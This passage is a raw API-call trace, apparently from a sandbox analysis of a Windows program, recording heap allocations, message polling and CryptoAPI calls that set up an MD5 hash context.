out: hHeap=0x970000) returned 1 [0267.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0267.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.408] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.409] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0267.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.410] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.411] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0267.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.412] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0267.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.412] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.412] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.413] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.413] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.413] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.413] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.413] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.413] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.414] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0267.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.414] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.415] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.415] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.415] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0267.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.416] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.416] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.416] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51eb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0267.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.417] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0267.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0267.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0267.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0267.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.418] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0267.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.420] HeapFree (in: hHeap=0x970000, 